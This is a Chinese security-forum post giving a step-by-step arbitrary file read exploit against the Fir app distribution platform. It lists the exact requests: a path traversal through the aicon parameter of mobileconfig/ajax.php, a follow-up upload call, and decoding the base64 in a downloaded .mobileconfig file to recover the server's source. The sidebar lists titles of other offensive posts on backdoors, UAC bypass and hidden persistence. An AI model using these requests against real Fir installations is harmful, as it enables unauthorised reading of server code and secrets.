Fir分发平台某处任意文件读取漏洞-思路分享社区-Web安全-赤道学院

Fir分发平台某处任意文件读取漏洞

root徽章-创作大使-赤道学院等级-LV2-赤道学院15天前发布
60

CMS 目录结构:

Image description

data
source
static
.htaccess
.user.ini
admin.php
app.php
favicon.ico
index.php
install.php
robots.txt
 

漏洞利用判断文件:/source/pack/mobileconfig/ajax.php

利用第一步:

/source/pack/mobileconfig/ajax.php?ac=mobileconfig&title=1&url=1&aicon=../../../index.php

Image description

会得到一个:312-1656570391

利用第二步:

/source/pack/upload/index-mobileconfig.php?time=上一步获取的值填写到这里&id=0

成功后得到返回 1

Image description

紧接着来到个人中心,会看到一个生成的APP

Image description

然后点击进入APP详情

Image description

/source/index/ajax_profile.php?ac=downapp&id=ID值每个不同

Image description

最后下载到本地一个 .mobileconfig 文件,打开。

Image description

把这里的base64 解码。

Image description

得到源码。

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

用户封面
root的头像-赤道学院
开启XP_CMDSHELL的多种方案
宝塔面板之定义一个自动登录后门
宝塔将指定Header Key的所有请求日志不存储到数据库
Stunnel + HaProxy + Danted 打造属于自己的 Socket5 代理池
PowerShell修改lnk属性实现BypassUac
Ubuntu 开启证书登录与密钥登录双模式运行
热门帖子

热门文章
权限维持之隐藏计划任务多版本实战演示-赤道学院
929人已阅读
权限维持之隐藏计划任务多版本实战演示
TOP1
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址-赤道学院
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址
11个月前253人已阅读
TOP2
SSRF漏洞之Gopher协议发起GET与POST请求-赤道学院
SSRF漏洞之Gopher协议发起GET与POST请求
10个月前252人已阅读
TOP3
Windows 管理员账户空密码如何实现登陆?-赤道学院
Windows 管理员账户空密码如何实现登陆?
10个月前205人已阅读
TOP4
BurpSuite进行后台管理员账户密码爆破-赤道学院
BurpSuite进行后台管理员账户密码爆破
10个月前204人已阅读
TOP5
SQL注入+文件下载实现任意文件读取-赤道学院
SQL注入+文件下载实现任意文件读取
11个月前198人已阅读
TOP6
扫码添加微信-赤道学院
在手机上浏览此页面